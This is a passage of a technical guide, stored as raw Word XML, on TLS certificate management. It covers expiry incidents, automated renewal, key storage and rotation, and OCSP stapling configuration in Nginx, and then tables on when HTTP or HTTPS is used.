    <w:p w14:paraId="20B94F6D" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Real-world incidents:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0028C212" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="951"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Microsoft Teams (2020):</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t> Certificate expired, took down the service for hours.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36A9EC3B" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="951"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>LinkedIn (2019):</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t> Expired cert on a subdomain caused partial outage.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FD8560C" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="951"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Ericsson (2018):</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t> Expired cert in mobile network software caused nationwide cellular outage (UK, Japan).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1969DE95" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Prevention:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D8CB3E7" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="952"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Automated renewal (Let's Encrypt + cert-manager = auto-renew at 60 days, 30-day buffer).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69DE5A1D" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="952"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Certificate monitoring (external services that probe your endpoints and alert days before expiry).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12340964" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="952"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Short-lived certificates (24-hour certs from internal PKI — expiry is a non-event because rotation is constant).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="715908A8" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="952"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Alerting on certificate age: alert when any cert has &lt; 30 days remaining.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FAE123C" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>20.2 Key Storage and Protection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53FE75B7" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Where the private key lives:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63F6D94D" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="953"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>On disk (most common):</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t> File permissions restrict access. Risk: server compromise exposes key.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FFB476D" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="953"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>HSM (Hardware Security Module):</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t> Dedicated hardware that stores keys and performs crypto operations. Keys never leave the HSM. Expensive but highest security.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35EFDC04" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="953"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Cloud KMS:</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t> AWS KMS, Google Cloud KMS, Azure Key Vault. Keys stored in managed HSMs. API-based access with IAM controls.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DD860DD" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="953"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>In-memory only (ephemeral):</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t> Key exists only in process memory. Not persisted to disk. Risk: lost on restart (must re-fetch from secure store).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0108EF35" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Key rotation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ECD6D77" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="954"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>When a key might be compromised → immediate rotation + certificate reissuance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39ED4453" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="954"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Routine rotation (yearly) as a best practice even without compromise suspicion.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E62FE24" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="954"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>With short-lived certificates (service mesh), rotation happens every 24 hours automatically.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16BC8AB1" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>20.3 OCSP Stapling Configuration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A215315" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Without stapling:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B7D41F7" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="955"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Client connects to your server, gets certificate.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F588BCE" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="955"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Client queries the CA's OCSP responder: "Is this cert revoked?"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22F826F8" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="955"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:lastRenderedPageBreak/>
        <w:t>OCSP responder is slow or down → client waits (adds 100–500ms) or proceeds without checking (less secure).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24FBB65C" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>With stapling:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="678FBF16" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="956"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Your server periodically (every few hours) fetches its OWN OCSP response from the CA.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10A29CC4" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="956"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>During TLS handshake, server includes the fresh OCSP response (stapled to the certificate).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4964C2A6" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="956"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Client validates the stapled response (it's signed by the CA — can't be forged).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="398C4407" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="956"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>No extra OCSP query needed → faster + more private (client doesn't tell the CA which sites it visits).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="551AA5B2" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Configuration (Nginx):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A537FBE" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7058934F" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>ssl_stapling on;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11181E23" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>ssl_stapling_verify on;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6548CF7F" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>ssl_trusted_certificate /path/to/chain.pem;  # includes intermediate CA for verification</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="354D307A" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>resolver 8.8.8.8;  # to resolve CA's OCSP responder hostname</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D497D07" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:pict w14:anchorId="7A143500">
          <v:rect id="_x0000_i3994" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="374E650A" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>21. HTTP vs. HTTPS — The Complete Decision Framework</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5586EEE6" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>21.1 When HTTP Might Still Be Used</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319"/>
        <w:gridCol w:w="5031"/>
      </w:tblGrid>
      <w:tr w:rsidR="006E6644" w:rsidRPr="006E6644" w14:paraId="1206AD5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87C539" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
              </w:pBdr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Scenario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A5E31D" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
              </w:pBdr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Justification</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006E6644" w:rsidRPr="006E6644" w14:paraId="2D8E253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34F2B2" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
              </w:pBdr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:t>Internal health check endpoints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4F5573" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
              </w:pBdr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:t>Not exposed externally, performance-sensitive</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006E6644" w:rsidRPr="006E6644" w14:paraId="4089C4B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36CCB4" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
              </w:pBdr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:t>Local development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57FCCA" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
              </w:pBdr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:t>Complexity of cert management for localhost</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006E6644" w:rsidRPr="006E6644" w14:paraId="423E0A8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4BCF7D" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
              </w:pBdr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:t>Behind a TLS-terminating proxy (backend ← LB)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639452" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
              </w:pBdr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:t>Traffic already decrypted at LB, internal network trusted</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006E6644" w:rsidRPr="006E6644" w14:paraId="180B5D2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276F5B" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
              </w:pBdr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:lastRenderedPageBreak/>
              <w:t>Legacy IoT devices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E7CF60" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
              </w:pBdr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:t>Can't handle TLS (constrained CPU/memory)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006E6644" w:rsidRPr="006E6644" w14:paraId="3394AFE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00B13B" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
              </w:pBdr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:t>Redirect endpoint (port 80)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9BC9AC" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
              </w:pBdr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:t>Solely to redirect to HTTPS (no actual content served)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6A2C8096" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>21.2 When HTTPS is Non-Negotiable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872"/>
        <w:gridCol w:w="5478"/>
      </w:tblGrid>
      <w:tr w:rsidR="006E6644" w:rsidRPr="006E6644" w14:paraId="4DAA4B7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4DF4A0" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
              </w:pBdr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Scenario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AE7ACF" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
              </w:pBdr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Why</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006E6644" w:rsidRPr="006E6644" w14:paraId="4048985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1ED0A8" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
              </w:pBdr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:t>Anything on the public internet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377321" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
              </w:pBdr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:t>Privacy, integrity, trust</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006E6644" w:rsidRPr="006E6644" w14:paraId="3318E8B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0A571E" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
              </w:pBdr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
